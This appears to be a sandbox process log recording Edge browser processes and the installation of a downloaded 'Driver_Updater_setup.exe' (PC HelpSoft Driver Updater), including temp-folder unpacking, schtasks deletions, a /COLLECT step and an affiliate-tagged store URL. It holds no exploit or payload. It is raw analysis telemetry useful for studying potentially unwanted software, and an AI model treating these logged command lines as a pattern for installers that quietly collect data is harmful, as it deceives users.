"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=9596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10328 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10332 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9708 /prefetch:8
C:\Users\Admin\Downloads\Driver_Updater_setup.exe
"C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
C:\Users\Admin\Downloads\Driver_Updater_setup.exe
"C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
C:\Users\Admin\Downloads\Driver_Updater_setup.exe
"C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-BCPKK.tmp\Driver_Updater_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BCPKK.tmp\Driver_Updater_setup.tmp" /SL5="$1401C8,5854474,811008,C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-4LCAM.tmp\Driver_Updater_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4LCAM.tmp\Driver_Updater_setup.tmp" /SL5="$501DC,5854474,811008,C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp" /SL5="$3022A,5854474,811008,C:\Users\Admin\Downloads\Driver_Updater_setup.exe"
C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
"C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe" /INSTALL
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Delete /TN "PC HelpSoft Driver Updater Schedule" /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Delete /TN "PC HelpSoft Driver Updater Monitoring" /F
C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
"C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe" /START /INSTALLED
C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe
"C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8976 /prefetch:2
C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
"C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe" /TRAY
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\tmpCC1B.tmp_collect\PCHelpSoftDriverUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\tmpCC1B.tmp_collect\PCHelpSoftDriverUpdater.exe" /COLLECT
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://store.pchelpsoft.com/clickgate/join.aspx?ref=pchelpsoft.com&ujid=n4l4AdUDqyE%3D&uid=1020464&cmp=ADWORDS&mkey1=PH_DU_ESC_WORLD_PP_GO_CO&key1=_&key2=__Device_Bluetooth&gclid=EAIaIQobChMI8M6O1_LSiQMVwkgdCR1NEyMVEAEYASAAEgIiufD_BwE&msclkid=&src=&wID=&affcookiename=&mkey5=offers.pchelpsoft.com/driver_updater/&HostBrowser=ED&software=offers-driverupdater&mkey4=ecdf697f-d5c5-ba12-78b4-1f1dfa421561&visitorid=ecdf697f-d5c5-ba12-78b4-1f1dfa421561&mkey3=win_cta1&mkey6=0&mkey7=NO_TRIAL&mkey8=4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x12c,0x154,0x7ffdd6ed46f8,0x7ffdd6ed4708,0x7ffdd6ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ResizeGet.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffdd6ed46f8,0x7ffdd6ed4708,0x7ffdd6ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
